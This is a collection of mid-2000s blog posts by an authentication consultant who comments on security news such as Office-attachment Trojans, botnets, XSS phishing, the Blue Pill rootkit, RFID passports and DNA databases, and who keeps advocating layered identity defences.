AuthenticationWorld Blog

In yesterday's Cnet news, an article was posted titled "The future of malware: Trojan Horses". It highlights how easy it is for cybercrooks to fly in under the enterprise's firewall and virus scanners by simply attaching an infected MS Office document to the email. The user clicks on the attachment, the malware is released and the enterprise is at medium to high risk dependant upon what the malware will do. Further, the article stated that only four antivrus softwares detect one type of attack that was first spotted months ago.

Bottom line: Don't expect your firewall and outer defences to defend the enterprise. Like the old castles built in the medieval days, you need to have a series of defences with the strongest being at the center. In enterprises, the walls need to be built using identity defences. As the identity gets closer and closer towards high risk systems, networks, buildings, rooms, applications and information, the authentication requirements must be increasingly stronger.

Build a layered identity defense using stronger authentication or....you'll be sorry.

Hi,

My name is Guy Huntington. For the past nine years, I have lead many large Fortune 500 identity and authentication projects including Boeing, Capital One and Kaiser Permanente. I have many battle scars from implementing single sign on, reduced sign on, enterprise single sign on, PKI, federated authentication, web services, LDAP directories, virtual directories, etc.

During the next several months I will be posting to this blog reactions to topical news stories involving authentiation as well as putting forward my ideas on things that might not be making news but are definitiely on the authentication radar screen. This will include things like "who owns a biometric?", the use of DNA for identificaiton and authentication, layered identity defenses, etc.

Please join with me in this conversation. I welcome all your comments, ideas and criticisms.

Regards,

Guy Huntington
guy.huntington@authenticationworld.com
www.authenticationworld.com

Hi,

Over the course of the next few months, I am going to be talking about who owns the biometric data you submit to an enterprise for identification and authentication. It is an area I am personnaly very concerned about since I feel that the technology and the usage of the biometrics is way ahead of the laws to protect the user.

Today, in many jurisdictions around the world, there are laws pertaining to DNA databases. The laws vary widely on how the data is used. During the next month, I'll publish a review of the existing laws and discuss the implications to the citizen.

If you have any special knowledge on the laws in this area or concerns, please email me to let me know. I will take this into consideration in drafting my initial report.

Regards,

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

New RFID tech would track airport passengers

The story above, posted on Friday on Cnet, is another sign that big brother is watching your movements more and more. Under the pretense of airport security, it states that within two years most airports will have all people who are in an aiport wear some kind of tag that emits a radio frequency enabling the authorities to see where you are at any point in time in the airport (known as a RFID tag).

While I am in favor of suppporting good security, this is ridiculous. What airport security breach or disaster over the last several years has been caused by not knowing where a person is at any point in time? The people who hijacked the planes that attacked New York were all captured on TV as they entered the airport and went to the gates. The problem was that nobody knew they were terrorists to begin with.

There are enough security cameras already in airports to monitor suspicious people. There is no requirement to know exactly who I am and what I am doing in the airport or any other public place.

The march of big brother with the use of RFID continues with the insertion of RFID tags in new passports in the US. As Bruce Schneier, a noted security guru notes in his most recent monthly blog http://www.schneier.com/crypto-gram-0610.html#3, there are too many questions to be answered before the governments use RFID in their passports. His recommendation is to get a new passport without an RFID tag in your passport now before the government's around the world begin fullscale introduction of this during the coming year.

Big brother is watching and it's beginning to be too much. What do you think?

Today, it was widely reported that a new bug exists in MS PowerPoint. The bug is deemed highly critical by some experts.

The great threat to enterprises is from a MS Office document that is infected with malware and is attached to email. The result is that this effectively passes underneath the enterprise firewall and anti-virus radar. The malware then is released from within the enterprise network. It could easily capture you users uid's and passwords used internally.

This is but one of many examples of why enterprises need to deploy a layered identity strategy. In my paper "Battling Botnets and Rootkits - A layered identity strategy" I refer to nine recommended security layers.

Hopefully you are not like most enterprises that still rely upon the firewall, anti-virus software and uid's and passwords as the main lines of defence.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

On October 5, 2006 a company in the UK, GFI, issued a press release titled "GFI warns one anti-virus engine is not enough to protect your business". They have recently published a report saying that one antivurs software is no longer sufficent for an enterprise. The report quotes "According to the 2006 FBI Crime and Security Survey, 97% of organizations have anti-virus software installed, yet 65% have been affected by a virus attack at least once during the previous 12 months. Network World cited studies that placed the cost of fighting Blaster, SoBig.F, Sober and other email viruses at $3.5 billion for US companies alone. Similarly a 2006 study by the British government found that 43% of companies in the United Kingdom were infected by viruses during 2005."

Their solution is of course their own product which can manage several different anti-virus vendors. Their thinking is that more is better.

While there may be some merit to this idea that the anti-virus software from one vendor might not catch all malware, there is no way that even with the best, most up to date, antivrius system in the world, that this will be enough.

A janitor who installs a hardware keyboard logger on your key users' computers at night, completely files underneath all the enterprise radar. A criminal with a sound dish can now record your office keystrokes and quickly depcipher your id and password.

The answer is to have a layered identity defence. "Battling Botnets and Rootkits - A Layered Identity Defense" describes the overall architecture required.

Beware vendors who claim their one product will solve the problem. It is likely to be breached.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

A report from September by Nucleus Research "What is the right password strategy?" found out "Unfortunately, more than one out of every three enterprise users keep a written record of their passwords. Contrary to popular belief, a survey of
325 users found that making users choose complex passwords or change
them frequently doesn’t make them more likely to write them down."

They note "Of the third of users that write down their passwords, one third of those do it on
paper, such as a sticky note. Even more dangerous are the other two thirds: they
keep their passwords as a text file on their laptop PC or mobile device, where it
could be easily lost or stolen."

Further "Although single sign-on may be convenient, it didn’t reduce the likelihood users
would write down their passwords either: whether users had one, two to three, or
four or more passwords to remember at work, roughly one third of all of them
wrote down their passwords."

Okay, all of this makes sense. However, their recommendation does not.

"Educating users on password security may have some effect. However, this study
shows that if you’re looking for real access security, you’ll need to look beyond
passwords. Some companies look to biometrics to increase security; other vendors
such as Unomi are promoting cognitive biometrics as a higher-level authentication
technology. Companies concerned about password security should continue to
watch innovation in the authentication market."

This is what I call the "silver bullet solution". A BIOMETRIC IS NOT A SECRET. Further, there are wide differences in the accuracy, postive and false negatives for different typed of biometrics. Biometrics alone are not the answer.

Sorry to keep repeating in each blog the same recommendation but here it is again. Enterprises need a layered enterprise identity strategy. It could start out with one password to gain general access (recommended using a keyboardless entry), then as risk rises the user should be required to provide combinations of something they know (which normally is a secret), something they have (like a smart card, a secureID token, etc) and something they are ( one of many types of biometrics).

There is no magic bullet.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Hi,

There's some depressing reading at eWeek. "Is the botnet battle already lost?" accurately describes the pitiful state enterprises are in trying to combat botnets. The general feeling is the war is lost for at least the next year or two.

The battle may be lost but the war doesn't have to end unfavorably for enterprises. What the article says is that botnets with their trojan and malware attack vectors are going to successfully defeat your outer firewalls and anti-virus programs. What the article doesn't say is how to accept this and build a successful strategy. That's where a layered enterprise identity strategy comes in.

Read my paper "Battling botnets and rootkits - A layered identity strategy". It describes nine layers of enterprise defences.

While the first three outer layers should be worked at, you must assume they will be breached. the other layers provide ways to restrict access by the botnets, rootkits and other malware to the enterprises highest risk applications, information, networks, buildings, floors and rooms.

It's time to wake up and smell the botnet electrons and get a layered defense ready to at least contain the damage.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Are you like me having trouble remembering all the uids and passwords you use? Do you keep using the same id and password over and over for all the sites? As you get older, are you forgetting which site you used which password for? Are you writing the passwords down or keeping them on your computer unsecurely?

While I am against the use of keyboard entered passwords in general, the facts are we are stuck with using them. Therefore, I strongly recommend the use of free software, Password Safe, originally produced by Bruce Schneier, the internet security guru.

This is a password vault using Schneier's Blowfish encryption. It is very easy to use and will help you stop forgetting your id and passwords, writing them down or storing them on your computer unsecurely.

However, note that the vault is protected by a....password! Therefore, the overall security is weak. Why? The password can be obtained by a hardware or software keyboard logger, guessed at using social engineering or cracked by a brute force attack.

Having said that, it is a better alternative than writing them down, forgetting them or storing them unsecurely.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Identity federation contunues to inch forward. This story out of Network World describes the federation between 24 universities and 11 other enterprises. InCommon, is the identity federation hub using Shibboleth.

InCommon, while acting as the identity hub, doesn't set trust standards. This is done by the universities and other parties as they negotiate their trust. However, InCommon does set two critieria for the federations: "The first is that their identity management system must fall under the purview of the organization’s executive management, and second, the system for issuing end-user credentials must have appropriate risk management measures in place."

The universites are using InCommon and Shibboleth to create trust agreements not only between themselves but also with their business partners.

Federation hubs like inCommon are the wave of the future. They act as legal framework where trust is negotiated.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Last Friday, eWeek ran a story "Spam Trojan Installs Own Anti-Virus Scanner" that tells about a new form of Trojan attack that comes with its own anti-virus scanner! This level of sophistication hasn't been seen before in Trojans.

The threat to users from this type of attack, on infected computers, is very large. The trojans are getting much smarter at trying to outwit your existing anti-virus software on your computer as well as "remove competing malware!"

Bottom line - You're in an arms race where it doesn't pay to stand still and rely upon one or two levels of defense i.e. the firewall and the anti-virus software. While you need to keep up pressure on your firewall and anti-virus vendors to quickly produce updates in response to these types of attacks, you must not rely upon these defences to keep out all attacks.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Today in Australia, the Internet Industry Association (IIA) announced it will be offering end-users free trial of anti-spyware, anti-virus and anti-spam products as part of its GetNetSafe program. The program will help raise awareness of spyware’s ability to log keystrokes and steal personal information from computers.

“The focus of computer threats has changed considerably over the last 12 months to become highly targeted at small groups of internet users”, Sean Richmondof Sophos said in a statement.

“Cyber criminals are using spyware programs, trojan horses and phishing campaigns to acquire corporate and personal information in the hope of stealing significant amounts of money from their victims.”

Hmmm...I think there's a lot of end user and enterprise education that must be done quickly. I will have a series of product announcements to aid in this effort in three weeks time.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

The age of passwords is dead. They are too easily broken by brute strength computer processing, by social engineering or by keyboard logging attacks. The recommended solution proposed by security experts for the last few years has been multi-factor authentication.

This usually uses some kind of smartcard that can produce a one time password which only the enterprise will know and, the use of a user id and even perhaps a password. The chances of someone else having masqeurading as the identy having the card and the knowledge is a lot lower than someone who simply has to input their id and password into a screen.

However, as I watch the commercial landscape and see all sorts of two factor authentication emerging, I am reminded of a blog Bruce Schneier, the noted internet security guru, wrote in April of 2005. In the blog Bruce notes that two factor authentication won't stop identity theft. He notes that this merely means that criminals change their tactics.

In other articles Bruce notes that the criminal tactics of phishing mereley adjust for the new two factor authentication. The criminals pass on the changing part of the password to the bank and the non changing part.

Will two factor authentication solve identity theft...no. However, it is a much better tool to use to help mitigate the attacks than the password.

What are solutions for preventing phishing attacks?

There is the use of trusted third party identification. The trusted third party validates the identity of the user. This will help reduce phishing BUT only as long as the trusted third party is validating the real identity. When the trusted third party is spoofed by a masquerader then identity theft can occur.

We're in an arms race where no one solution is going to solve the problem.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

A news story today in the Daily Telegraph in London "DNA Database should include all" quotes Tony Blair as saying all UK citizens should be in the database.

"Downing Street said later that no thought had been given at this stage to requiring everyone to give a DNA sample, although they will have to give scans of their eye and fingerprints for a passport and eventually a national identity card. At this stage, the Prime Minister believed it was a "personal matter" whether people, including other Government ministers, should volunteer their DNA."

This is exactly what I am very worried about! It is government creep on indexing pieces of an identity for which there are no laws in place:
* protecting the identity from mis-use of it's biological information
* guaranteeing an identity's privacy
* requiring specific processes to collect the samples
* requiring strong security around the data
* requiring specific legal approvals from the identity for a search to be made on their sample
* no idea on differentiating identitical twins
etc.

This past spring I wrote a draft white paper "The Challenges With Identity Verification". In it I called for a national DNA database where the user has almost full control over when their data can be searched.

Let me state that my preference is that there be no national biological identity registry. However, if there is going to be one, then let the identity have control over their biological identity and strictly govern how the data is collected, how it's stored and how any search can be made against this. I wrote the white paper as I feared government creep on DNA.

If you're reading this blog and you're worried about what the government knows about you, then it's time to take action. Let your politicians know your concerns. Otherwise, government creep will put in place systems that erode the basic biological definition of you. In the not so distant future, a DNA sample will allow others to clone you or pieces of you.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

RSA announced yesterday the new product offering of biometric voice authentication for banking transactions. This offering relies on the voice biometric AS WELL AS transaction authentication.

Each call is given a risk score. Higher risk transactions require more authentication of the identity including asking them secret questions. Each call is weighed by not only the biometric but also includes the user behaviour proile (e.g. time of day, phone number the user is coming in from, the transaction amount versus history of transactions, etc).

This is a good example of the future of authentication. Based on enterprise risk, a multi-factor authentication model is applied. For higher risk activities, such as financial transactions, transaction authentication is used to supplement the initial authentication. Therefore, even if the authentication was successful, in this case using a biometric, the transaction may be stopped, further questions asked, or a manager flagged in real time if the user profile exhibits unusual behaviour.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

In an earlier blog about two factor authentication, I discussed how phishing attacks would adjust for this and that two factor authentication would not prevent identity theft. This blog will give one example of this.

Last month, Mitre, A US government funded institution said the number one security threat was cross-site scripting (XSS). This is some client side scripting where the website accepts some form of content from the user such as a search box or email form. The problem arises when the websites don't propelry strip out malicious code in the script.

Here's how a phisihing attack might work in the future using this vulnerability. The user clicks on a link in their email. The link directs them to the legitimate website of the company. The user then logs in with their multi-authentication (like a id and a secureID token for instance). When the user is successfully logged on, unbeknownst to the user is the fact that the cross-site script kicks in and then offers control of the user's session to a criminal. The criminal proceeds to make a withdrawl from the bank account or use the user's credit card to make a purchase or whatever.

Therefore the strong authentication has not prevented identity theft. The best defence is for the enterprise to use transaction authentication software to mitigate the risk from these types of attacks. Using transaction authentication, it would note that the withdrawl amount is much larger than usual, or the purchase too large compared to historical purchases, or the destination of the money or product not in keeping with the customer's history, or their IP address is different than normal, etc. It would therefore stop the ttransaction or, flag a manger in real time or ask the user a lot more personal questions to vaildate their identity.

More references and blogs on cross-site scripting:
Brian Krebs Washington Post - Flaws in Financial Sites Aids Scammers
Brian Krebs Washington Post - Cross site scripting flaws abound
ComputerworldHow to defeat the new No. 1 security threat: cross-site scripting
Security Lab's XSS list

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

eWeek released yesterday a story "Rutkowska: Anti-Virus Software Is Ineffective" which I strongly recommend readers read. The article interviews Joanna Rutkowska, who has recently gained a lot of press by releasing a rootkit attack on Windows Vista. More importantly, she also introduced "Blue Pill".

Blue Pill is a small program that creates a hardware virtual machine and then moves the running native operating system into that virtual machine while the program becomes something called a "hypervisor". The hypervisor can take contol of the full operating system without the system admins even knowing about it.

Rutkowska says that she thinks it will be two to three years before OS system and hardware vendors create defense mechanisms. She points out that this kind of attack will usually come from a targeted attack rather than in broad scale worm attacks.

Her analysis of anti-virus software is very hard. She says existing anti-virus software "They all concentrate on finding "the bad" instead of verifying that system is in a "good" shape." Further she goes on to say "Similarly, we see that most of the rootkit scanners implement various hacks to detect hidden objects, like hidden processes, forgetting that it's possible to create a powerful stealth malware without even creating a process. There's no need to hide anything. I actually demonstrated a "stealth-by-design" malware almost a year ago."

Joanna then goes on to describe what she thinks the future is for anti-virus software. Type II Malware ("malware which doesn't modify any code sections in memory, just data sections (thus it's so difficult to detect") should be detected by checking the integrity of all system components.

She points out that even with a perfect integrity check of all of the system components, that this will not detect Type III Malware of which Blue Pill is an example. "The whole point about Blue Pill is that it does not introduce even a single byte modification into kernel, or other processes' memory. So, no matter how sophisticated (complete) our integrity checker is, we would never detect it. We can only count on detecting some side effects, like network communication or trying to detect the presence of a hypervisor using a timing analysis."

All in all, I can't imagine a stronger case for having a multi-layered enterprise defense strategy. Enterprises must admit that their existing firewall and anti-virus software won't stop all attacks over the next one to three years. As a result, they need to implement stronger and stronger layers of defences for higher risk networks, applications and information.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

This is just a short note to point readers to more information on Blue Pill which I described in my previous blog. For more information on Blue Pill go to Joanna's blog "invisible things"

Article comparing Intel VT vs AMD Pacifica

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Oftentimes, a number of federated authentication trust projects hit the wall. The main reason for this is that the enterprise lawyers get involved. All too often IT departments are caught unaware of what's required to create a trust federation.

To help edcuate IT and Legal enterprise managers about this, I have just released a new white paper "Creating a Federated Authentication Trust". In it, I highlight all the many things that need to be well thought through for creating an authentication trust. In the paper, I also reference some excellent resources on federation from Ping Identity and Liberty Alliance.

Enterprises need to be warned to allow enough time to bring the lawyers in early in a trust creation. The first one will normally take the longest as your enterprise lawayers get up to speed on what needs to be in a trust agreement.

It is to your advantage to join in a larger trust framework where many of the legal issues have already been worked out. What you want to avoid, if possible, is having to negotiate each trust agreement with all of the trust parties.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

A recent story in Computerworld "Less than zero-day' threats too often overlooked, analysts warn" is but another indication that enterprises need to have a deep set of layered defences to contain damage and protect themselves.

The article points out that too many enterprises are focussing on patches to zero day threats. As a number of analysts point out, this approach doesn't address attacks in the wild for which they haven't been reported.

A couple of days ago I blogged about Blue Pill. This is one type of attack for which it's likely most enterprises will not know about. Further, there are a number of other malware attacks for which the response from anti-virus vendors is slow.

We are in an arms race where tactical advantage currently is with the attackers. Organized crime currently has thousands or hundreds or thousands of programmers who are paid to breach systems. The type of attacks is growing increasingly sophisticated. For example, in the first half of 2006, Microsoft noted that it had found 43,000 new variants of backdoor trojans and bot attacks being broadcase by millions of computers to infect the internet.

It's not just the financial institutions that need to be worried. Small and medium businesses, non-profits, local, state and national governments also need to be worried since these attacks can easily be targeted at them as well.

The writing is in the wall for the next few years. There will be lots of stories of serious breaches, criminal theft and managers saying "we're taking steps to quickly address this" after they're attacked...when it's too late. If you don't want to be in this situation, then plan now for serious breaches and contain the damage by building layered security.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

The Government of Canada's Office of the Privacy Commissioner of Canada has recently released "Guidelines for Identification and Authentication". It provdes a good high level fly-over of identification and authentication.

The only comment I have to make is that the document should have raised a point about the use of biometrics and the privacy rights of the user to have their biometric information used. As far as I know, and perhaps I'm wrong, there is no legisltation in most jurisdictions in the world, specifying how biometric information can be used, the storage requirements for it, the retention time allowed for an enterprise to keep it and the rights of the user for it to be used. My own personal opinion is that this is case where technology is way ahead of the rights of the citizen.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Brian Krebs of the Washington Post has a great blog today titled "Scams Target Latest Upgrades in E-Banking Security". He notes that phishing attacks are rapdily adapting to multi-factor authentication protection by the banks.

This merely confirms what I wrote about earlier "Two factor authentication and identity theft". It's what Bruce Schneier wrote about in 2005.

Bottom line...multi-factor authentication is a good step forward BUT it won't prevent identity theft. The user has to be educated to not click on links in emails, no matter how legitimate they look or even if they come from a friend or business colleague. Caveat emptor!

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

This past week, Richard Stiennon, a noted network guru, did a podcast with Ken Steinberg, CEO of Savant Protection. Savant, a relatively new startup, offers the ability to deny all access to CPU unless the application or request has an approved certificate.

On the surface, this provides a more realistic defence against most malware. It accepts that malware will make its way into the enterprise one way or the other. By denying all requests to the CPU without a certificate effectively takes the legs out of the malware trying to get CPU time to download itself into the operating system.

I am not yet sure if this defense will defeat Blue Pill type attacks but it will definitely shut down most existing other malware attacks. I am also not yet sure of the performance degredation on each request to the CPU by using this method.

With those caveats stated, this type of defense is an excellent tool to consider utilizing for your enterprise. It avoids the lag time between existing anti-virus and firewall vendors discovering a security threat in the wild and issuing a patch. Furthermore, it also defends against most undiscovered malware threats which will pass below the enterprise anti-viral and firewall radar screens. Enterprises need to consider deplyoment of something like Savant Protection as one of their many layered defenses.

What won't it prevent? Criminals who obtain user's id and passwords, tokens and their biometrics and fraudulently masquerade as the user.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com

Malware continues to evolve. In this news story released yesterday, a new form of mass mailing worm infects a computer, steals its email contact list, emails out to everyone on the list, then the computers that are now infected update their code every 30 minutes from a variety of other computers! At least 150 different variations have now been identified.

This story indicates several things:
1. We can no longer maintain lists of "bad things" and let all the "good things" through the firewall. The rate of change of the malware is now way too fast for this to be reliable. Furthermore, someone has to discover a "bad thing" before it makes the list. What happens if your enterprise gets struck before someone discovers it and then makes a patch and then you install it?

2. The pace of attacks is picking up speed. There are so many computers on the internet that are infected, that there are now bot wars between malware trying to remove other malware. The number of infected computers means that the number of attacks increases. As bots evolve, this means that a new attack pattern can be quickly replicated and soon perhaps millions of computers are now infected and attacking the enterprise firewalls.

3. Enterpises need multiple layers of defense. The perimeter needs layers, inside the enterprise there also needs to be multiple layers of defense. Enterprises need to have a security architecture that admits that the outer and even some of the inner layers will be breached and prepare to contain the damage.

Guy
www.authenticationworld.com
guy.huntington@authenticationworld.com